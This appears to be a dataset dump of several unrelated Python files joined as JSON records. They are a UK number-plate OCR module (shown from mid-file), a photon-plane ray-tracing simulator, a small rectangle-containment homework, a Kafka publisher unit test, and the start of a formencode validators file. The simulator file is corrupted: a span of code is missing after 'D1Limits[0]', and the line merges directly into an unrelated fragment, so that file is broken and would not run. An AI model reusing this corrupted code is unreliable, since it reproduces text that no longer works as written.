1: xxcl = regData[xxl][2]\r\n if xxr is not None:\r\n if xxr - x <= tw + 1: xxcr = regData[xxr][2]\r\n xxc = max(xxcl, xxcr)\r\n if rd[x][2] < xxc: continue\r\n if xxc > 0:\r\n if (xxcr > 0) and (xxcl > 0):\r\n del(regData[xxl])\r\n del(regData[xxr])\r\n else:\r\n if xxcl > xxcr: xx = xxl\r\n else: xx = xxr\r\n del(regData[xx])\r\n regData[x] = rd[x]\r\n return regData\r\n\r\n # Detect plate rotation angle from alignment of cas char detections\r\n def rotFromCas(XYWHs):\r\n if len(XYWHs) < 2: return 0,0\r\n x = []\r\n y = []\r\n # Linear regression analysis on the list\r\n for X,Y,W,H in XYWHs:\r\n x.append(X + W/2)\r\n y.append(Y + H/2)\r\n x_mean, y_mean = np.mean(x), np.mean(y)\r\n x_span = max(x) - min(x)\r\n covar = 0.0\r\n for i in range(len(x)): covar += (x[i] - x_mean) * (y[i] - y_mean)\r\n b1 = covar / max(1, sum([(p - x_mean)**2 for p in x]))\r\n # b1 is slope, 0 = horiz, +ve = ?\r\n return math.atan(b1) * 180.0 / math.pi, x_span\r\n\r\n # Detect rotational angle of plate in image using hough lines\r\n def rotFromLines(img):\r\n # Find the longest (best) first few near-horizontal lines\r\n # scan down rapidly through length scale until we get > 3 results\r\n # then scan back up incrementally to find the first 3 H-lines\r\n PIBY180 = np.pi / 180\r\n ih,iw = img.shape\r\n llen = iw\r\n deglst = ()\r\n while (len(deglst) < 3) and (llen > 10):\r\n llen = int(llen * 0.9)\r\n lines = cv2.HoughLines(img, 1, PIBY180, llen)\r\n if lines is None: continue\r\n else:\r\n deglst = ()\r\n for line in lines:\r\n d, theta = line[0]\r\n degs = int(0.5 + (theta / PIBY180)) - 90\r\n dc = d + (iw * math.sin(degs * PIBY180) / 2)\r\n if (degs > -10) and (degs < 10) and (dc > ih * 0.1) and (dc < ih * 0.9): # look only at mid, near horizontals\r\n deglst += (degs,)\r\n keep = deglst\r\n while len(deglst) > 3:\r\n llen += 1\r\n lines = cv2.HoughLines(img, 1, PIBY180, llen)\r\n if lines is None:\r\n deglst = keep \r\n break\r\n else:\r\n keep = deglst\r\n deglst = ()\r\n for line in lines:\r\n d, theta = line[0]\r\n degs = int(0.5 + (theta / PIBY180)) - 90\r\n dc = d + (iw * math.sin(degs * PIBY180) / 2)\r\n if (degs > -10) and (degs < 10) and (dc > ih * 0.1) and (dc < ih * 0.9): # look only at mid, near horizontals\r\n deglst += (degs,) \r\n if len(deglst) == 0: return 0,0\r\n degs = votedAverage(deglst) # -ve result means anticlockwise rotation\r\n v = np.var(deglst)\r\n cnf = max(0, (1 - v)*0.66) # never that good!\r\n return degs, cnf\r\n\r\n # Detect the text skew angle using hough lines \r\n def skewAngle(img, th):\r\n PIBY180 = np.pi / 180\r\n ih,iw = img.shape\r\n llen = th\r\n deglst = ()\r\n while len(deglst) < 32:\r\n deglst = ()\r\n llen = int(llen * 0.95) - 1\r\n lines = cv2.HoughLines(img, 1, PIBY180, llen)\r\n if lines is None: continue\r\n else:\r\n for line in lines:\r\n d, theta = line[0]\r\n degs = int(0.5 + theta / PIBY180)\r\n if degs > 90: degs -= 180 # convert to a continuum\r\n if abs(degs) < 9: # pick only the near-verticals\r\n dc = abs(d) + (ih/2) * math.sin(degs * PIBY180)\r\n if (dc < iw * 0.1) or (dc > iw * 0.9): continue # reject anything at edges\r\n deglst += (degs, )\r\n if len(deglst) < 6: return 0, 0\r\n return np.median(deglst), 1 # works better than: sjmAvg2(deglst, 2), 1\r\n\r\n # Return the likelyhood value (from PlateLUT) of the supplied reg\r\n # pick best 0/1, O/I interpretation\r\n # Return -ve if there's no match to any format template\r\n def likelyhoodScore(reg):\r\n creg = characterise(reg, 1)\r\n keys = PlateLUT.keys()\r\n score = -20\r\n for fmt in keys:\r\n if dotMatch(creg, fmt): score = max(score, PlateLUT[fmt])\r\n return score\r\n\r\n # Assuming a -ve likelyhood score for the given reg, can we find a single mis-read\r\n # character that is causing a mis-match to a valid format template?\r\n # If so then, further, if that char is commonly mis-read we simply swap it for it's doppleganger.\r\n # Otherwise return ''\r\n def swapBadCh(reg):\r\n creg = characterise(reg, 1)\r\n keys = list(PlateLUT.keys())\r\n for k in range(len(keys)-1, -1, -1):\r\n fmt = keys[k]\r\n if len(fmt) == len(creg):\r\n badCnt = 0\r\n for i in range(0, len(fmt)):\r\n if creg[i] == '.': continue\r\n if creg[i] != fmt[i]:\r\n badCnt += 1\r\n badi = i\r\n if badCnt == 0: return reg\r\n if badCnt == 1:\r\n # dict of commonly mis-read alpha/num pairs\r\n # note that most are reversible but O/0 equivalence means D & Q have a one-way association with 0 \r\n SwapTab = {'8':'B', 'B':'8', 'Z':'7', '7':'Z', '6':'G', 'G':'6', '5':'S', 'S':'5', 'D':'0', 'Q':'0'}\r\n c = reg[badi]\r\n if c in SwapTab: return reg[:badi] + SwapTab[c] + reg[badi+1:]\r\n return ''\r\n\r\n # convert reg into @#.? format where # maps to any number, @ maps to any u/c alpha,\r\n # dot maps to 0,1,O or I and ? mops up anything invalid that shouldn't be there.\r\n # If argument dots = 0 then 01IO->dot mapping is not done\r\n def characterise(reg, dots=1):\r\n creg = ''\r\n for i in range(0, len(reg)):\r\n ch = reg[i]\r\n if (ch in 'IO01') and (dots != 0): ch = '.'\r\n else:\r\n if ch in '0123456789': ch = '#'\r\n else:\r\n if ch in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ': ch = '@'\r\n else: ch = '?'\r\n creg += ch\r\n return creg\r\n\r\n # see if two strings are the same BUT with dot as a wild-card char\r\n def dotMatch(str1, str2):\r\n if str1 == str2: return True\r\n if len(str1) != len(str2): return False\r\n for i in range(0, len(str1)):\r\n if (str1[i] != '.') and (str2[i] != '.') and (str1[i] != str2[i]): return False\r\n return True\r\n\r\n # Massage 0/O and I/1 characters in supplied reg to match most likely UK format\r\n def massage(reg):\r\n creg = characterise(reg, 1)\r\n if '?' in creg: return reg\r\n if '.' not in creg: return reg\r\n keys = PlateLUT.keys()\r\n hiscore = -1\r\n hifmt = ''\r\n for fmt in keys:\r\n if dotMatch(creg, fmt):\r\n if PlateLUT[fmt] > hiscore:\r\n hiscore = PlateLUT[fmt]\r\n hifmt = fmt\r\n if hifmt == '': return reg\r\n # do the massage\r\n ro = ''\r\n for i in range(0, len(creg)):\r\n ch = reg[i]\r\n if creg[i] == '.':\r\n if hifmt[i] == '@':\r\n if ch == '0': ch = 'O'\r\n elif ch == '1': ch = 'I'\r\n if hifmt[i] == '#':\r\n if ch == 'O': ch = '0'\r\n elif ch == 'I': ch = '1'\r\n ro += ch\r\n return ro\r\n\r\n # Return plate bounding-box XYWH from regData and initial crop XY info\r\n # Note that the bbox ignores any rotation / de-skew transformations\r\n def bbFromRD(rd,h,w,crop):\r\n X,Y = crop\r\n Xlist = sorted(rd)\r\n X = max(0, X + Xlist[0] - w)\r\n Y = max(0, Y + rd[Xlist[0]][1] - 3*h//4)\r\n W = Xlist[-1] - Xlist[0] + 2*w\r\n H = 3*h//2\r\n return (X,Y,W,H)\r\n\r\n # scan through a dictionary, look for longest index string length\r\n def maxlen(dctn):\r\n mx = 0\r\n for k in dctn: mx = max(mx, len(k))\r\n return mx\r\n\r\n # ------------------ main --------------------\r\n\r\n t0 = time.time()\r\n if DEBUG: print(\">>> start @ {:1.1f}\".format(time.time() - t0))\r\n\r\n PIBY180 = np.pi / 180\r\n CLAHE = cv2.createCLAHE(clipLimit=1, tileGridSize = (8,8)) # invoke a contarst-limited adaptive histogram equaliser\r\n\r\n # Convert input image to gry-scale if necessary, look for a license plate, crop source image.\r\n if len(in_img.shape) > 2:\r\n img = cv2.cvtColor(in_img, cv2.COLOR_BGR2GRAY)\r\n pcol = '' # detect plate colour later\r\n else:\r\n img = in_img\r\n pcol = '-' # plate colour: - => b/w image - can't detect b/g colour\r\n if (not isinstance(plateXYWH, tuple)) or (len(plateXYWH) != 4):\r\n rect = lookForPlate(img, TargetWH) # assumes a gryscale image\r\n else:\r\n rect = plateXYWH\r\n px,py,pw,ph = rect\r\n if pw == 0: return '!No Plate' \r\n rect1 = enlargeCrop(rect) # expand the AOI\r\n th = int(0.5 + ph/PH2TH)\r\n tw = int(0.5 + ASPECT*ph/PH2TH)\r\n imgry = cropIt(img, rect1)\r\n cropXY = (rect1[0], rect1[1])\r\n ih,iw = imgry.shape\r\n if DEBUG: print('Source img cropped to:', ih, 'x', iw)\r\n # Histogram-eq & de-noise\r\n img_gry = CLAHE.apply(imgry)\r\n img_gry = cv2.fastNlMeansDenoising(img_gry, None, 16, 7, 21)\r\n img_gry = CLAHE.apply(img_gry)\r\n # Neg detect, some plates are white-on-black, negate the image if approp\r\n x0,y0,x1,y1 = (iw-pw)//2, (ih-ph)//2,(iw+pw)//2, (ih+ph)//2, # define a smaller AOI\r\n img_t = cv2.adaptiveThreshold(img_gry[y0:y1,x0:x1], 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, th + (1 - (th % 2)), 2)\r\n if np.mean(img_t) < 128: # neg detection\r\n img_gry = 255 - img_gry\r\n imgry = 255 - imgry\r\n pcol = 'B'\r\n # Adaptive threshold & edge detect ready for hough lines\r\n img_thr = cv2.adaptiveThreshold(img_gry, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, th + (1 - (th % 2)), 2)\r\n skel = cv2.Canny(img_thr, 100, 200)\r\n if DEBUG: skel0 = skel.copy() # keep a copy of original\r\n\r\n if DEBUG: print(\">>> start horizontalisation @ {:1.1f}\".format(time.time() - t0))\r\n\r\n # Horizontalisation...\r\n # Detect rotation...\r\n # 1. using SJM's Haar-Cascade character spotter\r\n chsList, Yav = seekChrs(img_gry, (tw,th))\r\n rfc, xspan = rotFromCas(chsList)\r\n ccnf = min(1, xspan/pw) # confidence range 0 .. 1\r\n # 2. using Hough lines\r\n rfl, lcnf = rotFromLines(skel)\r\n # combine results\r\n if lcnf + ccnf > 0:\r\n # average results according to relative confidences \r\n degs = ((rfc * ccnf) + (rfl * lcnf)) / (ccnf + lcnf) \r\n if DEBUG: print('Detected rotation: {:0.2f}'.format(degs))\r\n if abs(degs) >= 0.15:\r\n if DEBUG: print('Fixing rotation...')\r\n rmx = cv2.getRotationMatrix2D((iw//2,ih//2),degs,1)\r\n img_gry = cv2.warpAffine(img_gry, rmx, (iw,ih))\r\n imgry = cv2.warpAffine(imgry, rmx, (iw,ih))\r\n # re-make skel fro de-skew\r\n img_thr = cv2.adaptiveThreshold(img_gry, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, th + (1 - (th % 2)), 2)\r\n skel = cv2.Canny(img_thr, 100, 200)\r\n else:\r\n if DEBUG: print(\"Can't determine rotation\")\r\n\r\n if DEBUG: print(\">>> start de-skew @ {:1.1f}\".format(time.time() - t0))\r\n\r\n # De-skew...\r\n # Find skew angle...\r\n degs, cnf = skewAngle(skel, th)\r\n if cnf > 0:\r\n if DEBUG: print('Detected skew: {:0.2f}'.format(degs))\r\n # -ve result means chars slope backwards\r\n d = ih * math.tan(degs * PIBY180) # deskew amount in pixels\r\n if abs(d) >= .5:\r\n # apply skew correction\r\n if DEBUG: print('Fixing skew...')\r\n xl,xr = int(iw * 0.1), int(ih * 0.9)\r\n pts1 = np.float32([[xl, 0],[xr, 0],[0,ih-1],[iw-1,ih-1]]) # 4 source points\r\n pts2 = np.float32([[xl-d,0],[xr-d,0],[0,ih-1],[iw-1,ih-1]]) # 4 destn points\r\n PT = cv2.getPerspectiveTransform(pts1,pts2)\r\n img_gry = cv2.warpPerspective(img_gry, PT, (iw, ih))\r\n imgry = cv2.warpPerspective(imgry, PT, (iw, ih))\r\n\r\n if DEBUG: print(\">>> start enhance @ {:1.1f}\".format(time.time() - t0))\r\n\r\n # More image enhancements...\r\n img_thr = cv2.adaptiveThreshold(img_gry, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, th + (1 - (th % 2)), 2)\r\n SE = cv2.getStructuringElement(cv2.MORPH_CROSS,(3,3)) \r\n img_t2 = cv2.dilate(img_thr, SE)\r\n img_proc = cv2.bitwise_and(img_gry, img_t2)\r\n img_t3 = cv2.erode(img_thr, SE)\r\n img_proc = cv2.bitwise_or(img_proc, img_t3)\r\n img_proc = cv2.blur(img_proc, (3,3))\r\n\r\n if DEBUG: print(\">>> start char height estimation @ {:1.1f}\".format(time.time() - t0))\r\n\r\n # Improve estimate of character height...\r\n # Also improve estimate of plate position and size\r\n # Method 1. Identify character bboxes using UKChar haar-cascade classifyer\r\n chsList, Yav = seekChrs(img_gry, (tw,th))\r\n if len(chsList) < 5: # maybe some more processing would help\r\n if DEBUG: print('Found only ',len(chsList),'chars, re-try with thresholding...')\r\n chsListB, YavB = seekChrs(img_proc, (tw,th))\r\n if len(chsListB) > len(chsList):\r\n chsList = chsListB\r\n Yav = YavB\r\n if DEBUG: print('Found', len(chsList), 'UKChars')\r\n # Compute centre-line, char height (and horizontal range for later)\r\n ycl = ih // 2\r\n Hlst = (th, )\r\n xl, xr = int(iw * 0.45), int(iw * 0.55)\r\n if (len(chsList) > 0):\r\n ycl = int(Yav + 0.5)\r\n for n in range(0, len(chsList)):\r\n Hlst += (chsList[n][3] * CAS_OVER, ) # HEIGHT compensated for over-estimation\r\n xl = min(xl, chsList[n][0])\r\n xr = max(xr, chsList[n][0]+chsList[n][2])\r\n if len(chsList) < 2: xl, xr = int(iw * 0.25), int(iw * 0.75)\r\n # Method 2. Locate & measure text-like blocks using the sobel filter\r\n sox = cv2.Sobel(img_proc, cv2.CV_8U, 1, 0, ksize=1)\r\n _,thx = cv2.threshold(sox, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\r\n SE = cv2.getStructuringElement(cv2.MORPH_RECT, (int(pw/3.5), int(ph/11)))\r\n morf=cv2.morphologyEx(thx, cv2.MORPH_CLOSE, SE)\r\n # measure text height at several mid-ish points along x-axis\r\n ths,ycls = measureTxH(morf, xl, xr)\r\n # Average both methods' data\r\n n = len(chsList)\r\n if (n > 0) and (ycls > 0): ycl = int(0.5 + (((ycl * n) + ycls) / (n + 1)))\r\n elif ycls > 0: ycl = ycls\r\n if (ths > 0): Hlst += (ths, )\r\n if len(Hlst) > 0: th = int(np.average(Hlst) + 0.5)\r\n if th > ih * 0.9: return '!Bad plate - text too big'\r\n if th < 20: return '!Bad plate - text too small'\r\n if DEBUG: print(\"Char height estimate:\", th, \"px\")\r\n if DEBUG: print(\">>> start contrast stretch @ {:1.1f}\".format(time.time() - t0))\r\n\r\n # Contrast-stretch(5%) the whole image using a histogram analysis from\r\n # just the central-th x central-coverage-width known plate area... \r\n # First, create the AOI mask image\r\n mask = np.zeros((ih,iw), dtype=np.uint8)\r\n x1,y1,x2,y2 = xl, int(ycl-(th/2)+1), xr, int(ycl+(th/2)-1)\r\n mask[y1:y2,x1:x2] = 255\r\n # calc the histogram...\r\n hist = cv2.calcHist([cv2.blur(imgry, (3,3))], [0], mask, [256], [0,256]) # get histogram of masked area\r\n newLUT = heq(hist) # equalise it\r\n for x in range(0, iw): # apply\r\n for y in range(0, ih): imgry[y][x] = newLUT[imgry[y][x]]\r\n\r\n # Prepare an image source for the XC stages...\r\n # Blurring helps to reduce the unwelcome image sharpening effects from the camera \r\n img_xc = cv2.blur(imgry, (3,3))\r\n\r\n # re-evaluate plate extents for initial XC AOI\r\n pw = int(PW2CH*th + 0.5)\r\n tw = int(ASPECT*th + 0.5)\r\n xl, xr = tw//2, iw-1-tw//2\r\n # Define initial AOI to height th*2 around ycl and width to xl..xr horiz extents\r\n AOI = [max(0, xl-(tw//2)), max(0, ycl-th), min(iw, xr+(tw//2)), min(ih, ycl+th)] # X1,Y1,X2,Y2\r\n\r\n if DEBUG: print(\">>> start XC stages @ {:1.1f}\".format(time.time() - t0))\r\n\r\n # XC OCR stages with character-size optimisation...\r\n # We template-match to a range of text sizes and shapes to try to find the optimum by\r\n # itteratively adjusting template th and tw for maximum peak-heights in the XC landscape\r\n # This is the real time-consuming stage so we do some tricks to minimise delays.\r\n # Note we exclude the I character here due to its anomalous width, see later\r\n n = max(4, len(chsList)) # the number of chars to pick from the top of the list when evaluating overall match quality\r\n chs = '23456789ABCDEFGHJKLMNOPQRSTUVWXYZ' # Valid UK plate characters w/o I\r\n base_xc, cv, yc, tmph, cxcLst, ppoints, regData = preScan(img_xc, AOI, chs, th, tw, n, pw, 0) # base measure\r\n ycl = int(yc + 0.5)\r\n # Increase speed by scanning a reduced character set and AOI\r\n # The poorer the over-all XC the more chars we scan for & the wider the AOI (& the slower the process)\r\n chs = sorted(cxcLst, key=cxcLst.__getitem__, reverse=True)[0:XC2N(base_xc)]\r\n AOI = AOIfromPks(iw, ih, tw, ppoints, base_xc, tmph, cv, ycl)\r\n if DEBUG: print('base xc:', base_xc)\r\n if DEBUG: print(chs)\r\n d = 1\r\n tho = th\r\n\r\n if DEBUG: print(\">>> start XC height opt @ {:1.1f}\".format(time.time() - t0))\r\n\r\n # text height optimisation...\r\n while True:\r\n if DEBUG: print(\"H-opt loop\")\r\n xc, cv, yc, tmph, cxcLst, ppoints, rd = preScan(img_xc, AOI, chs, th+d, int(((th+d) * ASPECT) + 0.5), n, pw, 0)\r\n regData = regMerge(regData, rd, tw)\r\n if xc <= base_xc:\r\n if d != 1: break\r\n d = -1\r\n continue\r\n if DEBUG: print('Improved th:', d, '=>', xc)\r\n chs = sorted(cxcLst, key=cxcLst.__getitem__, reverse=True)[0:XC2N(base_xc)]\r\n if DEBUG: print(chs)\r\n base_xc = xc\r\n ycl = int(yc + 0.5)\r\n AOI = AOIfromPks(iw, ih, tw, ppoints, base_xc, tmph+d, cv, ycl)\r\n tho = th+d\r\n pw = int(PW2CH * tho + 0.5)\r\n d = nextUD(d)\r\n th = tho\r\n\r\n if DEBUG: print(\">>> start XC width opt @ {:1.1f}\".format(time.time() - t0))\r\n\r\n # now width...\r\n n = min(7, min(3, len(regData)))\r\n tw = int((th * ASPECT) + 0.5) # starting point, based on best th\r\n d = 1\r\n two = tw\r\n while True:\r\n if DEBUG: print(\"W-opt loop\")\r\n xc, cv, yc, tmph, cxcLst, ppoints, rd = preScan(img_xc, AOI, chs, th, tw+d, n, pw, 0)\r\n regData = regMerge(regData, rd, tw)\r\n if xc <= base_xc:\r\n if d != 1: break\r\n d = -1\r\n continue\r\n chs = sorted(cxcLst, key=cxcLst.__getitem__, reverse=True)[0:XC2N(base_xc)]\r\n base_xc = xc\r\n ycl = int(yc + 0.5)\r\n AOI = AOIfromPks(iw, ih, tw, ppoints, base_xc, tmph, cv, ycl)\r\n two = tw+d\r\n pw = int(STW2TW * two) # better approximation to license-string width\r\n d = nextUD(d)\r\n tw = two\r\n\r\n if len(regData) == 0: return '!No reg data'\r\n\r\n if DEBUG: print(\">>> start I stage prep @ {:1.1f}\".format(time.time() - t0))\r\n\r\n pw = int(STW2TW * tw) # better approximation to total character-string width\r\n twI = int(tw * ASPI + 0.5)\r\n\r\n # Reject weak chars on the basis of an over-all quality score\r\n # Assumes forceFit() has previously run to extend the regData dict\r\n while rejectWeaklings(regData, 6.66): pass\r\n\r\n if DEBUG: pprint.pprint(regData)\r\n\r\n if len(regData) == 0: return '!No reg data'\r\n\r\n # re-calc base-xc & ycl on the remaining chars in prep for I stage\r\n base_xc = 0\r\n ycl = 0\r\n for x in regData:\r\n ycl += regData[x][1]\r\n base_xc += regData[x][2]\r\n base_xc /= len(regData)\r\n ycl = int(0.5 + ycl/len(regData))\r\n\r\n # Use a simpler centre-line scan for spotting I chars...\r\n ipoints = IScan(img_xc, ycl, twI, th)\r\n # Augment regData with the new I-spots resolving any conflicts by deleting the weaker char\r\n n = 0\r\n for x,y,xc in ipoints:\r\n if xc < base_xc * 0.6: continue # I xc must be in-line with other xcs\r\n if x in regData:\r\n if xc > regData[x][2]: regData[x] = ['I', y, xc]\r\n continue\r\n (xxl,xxr) = nearestValids(x, regData)\r\n xxcl = xxcr = 0\r\n if xxl is not None:\r\n if regData[xxl][0] == 'I': cw = twI\r\n else: cw = tw\r\n if (x - xxl) <= (2 + cw + twI)/2: xxcl = regData[xxl][2]\r\n if xxr is not None:\r\n if (xxr - x) <= (2 + tw + twI)/2: xxcr = regData[xxr][2]\r\n xxc = max(xxcl, xxcr)\r\n # Conflict: strongest XC wins but we bias the contest against I chars\r\n if math.pow(xc,1.5) < xxc: continue\r\n if xxc > 0:\r\n # new char is stronger, need to delete something.\r\n if (xxcr > 0) and (xxcl > 0):\r\n del(regData[xxl]) # delete the incumbants\r\n del(regData[xxr])\r\n else:\r\n if xxcl > xxcr : xx = xxl\r\n else: xx = xxr\r\n del(regData[xx]) # delete the incumbant\r\n regData[x] = ['I', y, xc]\r\n n += 1\r\n if n > 0:\r\n if DEBUG: pprint.pprint(regData)\r\n # re-run rejection processes on I-extended regData\r\n while delOOBChars(regData, pw, tw, twI): pass\r\n forceFit(regData, 1.33)\r\n while rejectWeaklings(regData, 8): pass\r\n\r\n if DEBUG: print(\">>> start finish-up @ {:1.1f}\".format(time.time() - t0))\r\n\r\n # if necessary reduce to the max allowed char count...\r\n w = 8.0\r\n mxln = maxlen(PlateLUT)\r\n while len(regData) > mxln:\r\n while not rejectWeaklings(regData, w): w *= 0.95\r\n\r\n regn = ''\r\n for rd in sorted(regData): regn += regData[rd][0]\r\n if regn.replace('I', '') == '': return '!No reg data'\r\n # Match to most likely UK reg format\r\n scr = likelyhoodScore(regn) # -20, 0 ... +20\r\n # compute a composite confidence factor 0..99, part base_xc, part likelyhoodness\r\n cnf = 0\r\n if scr < 0:\r\n # NOT a valid format!\r\n # If the error can be narrowed down to a single char then\r\n # a commonly mis-read alpha/num assoc could be swapped out:\r\n # ie: 8 <=> B, 5 <=> S, D => 0, Q => 0, 7 <=> Z, 6 <=> G\r\n # if so return a reduced conf < 80\r\n # Else Return a cnf of zero to indicate a non-confoming format\r\n # &&& Perhaps also challenge leading / trailing I chars\r\n alt = swapBadCh(regn)\r\n if alt != '':\r\n regn = alt\r\n cnf = int((base_xc * 0.8) * 100) # reduced conf\r\n else: cnf = int((base_xc * 0.9 + scr * 0.004) * 100 + 0.5) # composite conf\r\n regn = massage(regn) # optimise 0/O, I/1 choices \r\n\r\n # calc plate bbox relative to source image\r\n bbox = bbFromRD(regData, th, tw, cropXY) # XYWH\r\n\r\n # get plate b/g colour if possible...\r\n if len(pcol) == 0:\r\n # we have a colour source image, and it's not a wht-on-blk plate\r\n pcol = WhtOrYel(in_img, bbox) # returns Y or W or '-' if unsure\r\n # else pcol is already either '-' for unknowable or 'B' for black\r\n\r\n if DEBUG: print(\">>> end @ {:1.1f}\".format(time.time() - t0))\r\n\r\n return regn, cnf, bbox, pcol\r\n\r\n# ----------------- demo mode? Accept an image file name -------------------\r\n\r\nif __name__ == \"__main__\":\r\n import sys\r\n if len(sys.argv) > 1:\r\n img = cv2.imread(sys.argv[1])\r\n DEBUG = True\r\n print(ReadPlate(img, (170,50)))\r\n else: print('Please provide an image file name, UKRegOCR will try to find and read a UK number-plate') \r\n\r\n","repo_name":"Finitech-SDP/vision","sub_path":"licence_plate_recognition/UK_Plate/UKRegOCR.py","file_name":"UKRegOCR.py","file_ext":"py","file_size_in_byte":47414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43290375260","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 24 11:04:37 2021\n\n@author: astap\n\"\"\"\ntimestep = 1e-11;\nc = 3e8\n\n\nimport numpy as np\n\nimport jitSpeedup as speedUp\nfrom numba import jit\nfrom scenarioVariables import xLim, yLim, zLim, c, timestep\n\nisInLim = lambda D1Limits, D1Position: D1Limits[0] 1/np.sqrt(2)):\n xiHat = orthoProjection(iHat, zetaHat)\n else:\n xiHat = orthoProjection(jHat, zetaHat)\n xiHat /= norm(xiHat)\n etaHat = crossProd(zetaHat, xiHat)\n return np.array((zetaHat, xiHat, etaHat))\n\n\ndef unitSphericalDistribution():\n latDist = np.random.random()*2 - 1\n sgn = np.sign(latDist); latDist *= sgn\n latitude = np.pi*(np.sqrt(latDist)/2 if sgn>0 else 1-np.sqrt(latDist)/2)\n longitude = 2*np.pi*np.random.random()\n x,y,z = np.sin(latitude)*np.cos(longitude), np.sin(latitude)*np.sin(longitude), np.cos(latitude)\n return x,y,z\n\nclass plane:\n def __init__(self, location, direction):\n self.zeta, self.xi, self.eta = generateUnitBasis(direction)\n self.location = location\n self.markings = []\n #skaper en basis (xi, eta, zeta) for planet med 'direction'(=zeta) som enhetsvektor\n #i retning av planets normal-akse. Planet defineres\n #til å krysse location, og baserer sine koordinater ut fra dette\n\n\n def __le__(self, photon):\n relativeLocationInitial = photon.location - self.location\n zetaCoordinateInitial = dotProd(relativeLocationInitial, self.zeta)\n relativeLocationFinal = photon.nextStep() - self.location\n zetaCoordinateFinal = dotProd(relativeLocationFinal, self.zeta)\n return np.sign(zetaCoordinateFinal) != np.sign(zetaCoordinateInitial)\n #Returnerer sann dersom fortegnet til zeta-koordinatet endres\n #etter ett timestep. Nå vil 'plan <= foton' returnere sann\n #dersom fotonet krysser planet i løpet av neste timestep\n\n def __lt__(self, photon):\n if not (self <= photon): #Sjekker om det skjer skæring mellom plan og foton\n return False #Dersom ingen skjæring: Returner false\n relativeLocationInitial = photon.location - self.location\n planePhotonDistance = dotProd(relativeLocationInitial, self.zeta)\n requiredTravelDistance = planePhotonDistance/dotProd(photon.direction, self.zeta)\n inPlanePosition = photon.nextStep(distance=requiredTravelDistance);\n relativeLocationFinal = inPlanePosition - self.location\n self.markings.append(np.array((dotProd(relativeLocationFinal, self.xi), dotProd(relativeLocationFinal, self.eta))))\n return True\n\n\n\nclass photon:\n planes = []; #Alle aktuelle plan hvilket fotonet kan krysse\n\n def __init__(self, location, direction):\n self.location = location\n self.direction = normalize(direction)\n\n def nextStep(self, distance=c*timestep):\n return self.location + self.direction * distance\n\n def jitPrimer(self):\n planesCoordinates = [plane.location for plane in photon.planes]\n planesDirections = [plane.zeta for plane in photon.planes]\n initialCoordinates = self.location\n initialDirection = self.direction\n hitPlane, position = speedUp.jitTilHit(planesCoordinates, planesDirections,\n initialCoordinates, initialDirection)\n\n if not hitPlane:\n del self\n return position\n self.location = position\n\n\n for plane in photon.planes:\n if(plane < self):\n del self\n return position\n\n raise Exception(\"Disagreement of hit between jit-nopython and python\")\n\n\n\n\npl = plane(np.array((0.7,0.0,0.0)), normalize(np.array((-1.0,-1.0,0.0))))\nphoton.planes.append(pl)\n\nposes = []\nfor j in range(4):\n for i in range(1000):\n dir = unitSphericalDistribution()\n pos = np.array((-.9,-.9,.0))\n ph = photon(pos.copy(), dir)\n current_poses = [pos, ph.jitPrimer()]\n poses.append(np.array(current_poses))\n print(\"*\", end='')\n\nposes = poses[::4]\n\n\n\n\n\n\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfig = plt.figure(0)\nax = fig.add_subplot(111,projection='3d')\nfor path in poses:\n ax.plot(*path.T, ':', c=\"k\")\n\nscatterpos = []\nfor mrk in pl.markings:\n pos = pl.location + pl.xi*mrk[0] + pl.eta*mrk[1]\n scatterpos.append(pos)\nscatterpos = np.array(scatterpos)\nax.scatter(*scatterpos.T,c='r',marker='x')\nplt.show()\nfig.savefig(\"illustrasjon.pdf\")\n\nfig2 = plt.figure(1)\nplt.plot(*np.array(pl.markings).T, 'rx')\n\nplt.show()","repo_name":"Gardcs/VitBerBIO","sub_path":"simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":5111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"388977577","text":"def is_inside(list_1, list_2):\n if list_2[0] <= list_1[0] <= list_2[0] + list_2[2] and list_2[1] <= list_1[1] <= list_2[1] + list_2[3]:\n return True\n else:\n return False\n\n\ncheck = is_inside([250, 270], [140, 60, 100, 200])\nif check == False:\n print('Your function is correct')\nelse:\n print('Oops, bugs detected')\n","repo_name":"nganjjang/nguyenhangan-labs-c4e17","sub_path":"Lab3/homework/hw_lab3_ex12.py","file_name":"hw_lab3_ex12.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5927738685","text":"from publisher import Publisher, PublisherConfig\nimport json\nimport logging\nimport unittest\nfrom unittest.mock import MagicMock, Mock, patch\n\n\nclass MockedPublisher(Publisher):\n def __init__(self, config, topic):\n super().__init__(config, topic)\n self.publisher = MagicMock()\n\n\ndef test_send_message():\n publisher_config = PublisherConfig(admin=True)\n publisher = MockedPublisher(publisher_config, \"test_topic\")\n\n publisher.producer.send = MagicMock()\n publisher.logger.info = MagicMock()\n publisher.logger.error = MagicMock()\n\n mock_message = {\"msg\": \"Test message 1\"}\n\n with patch(\"logging.info\") as mock_logging_info, patch(\n \"logging.error\"\n ) as mock_logging_error:\n publisher.send_message(mock_message)\n\n # Pass the correct arguments to the `assert_called_once_with` method\n encoded_message = json.dumps(mock_message).encode(\"utf-8\")\n publisher.producer.send.assert_called_once_with(\n publisher.TOPIC_NAME, encoded_message\n )\n\n assert publisher.logger.info.call_count == 1\n","repo_name":"chrisguest75/python_examples","sub_path":"08_kafka/tests/test_publisher.py","file_name":"test_publisher.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71234410349","text":"import formencode\nimport tw2.core as twc\nfrom formencode import validators\n\n__all__ = [\"NotExistance\", \"ExistByPrimaryKey\"]\n\n\nclass 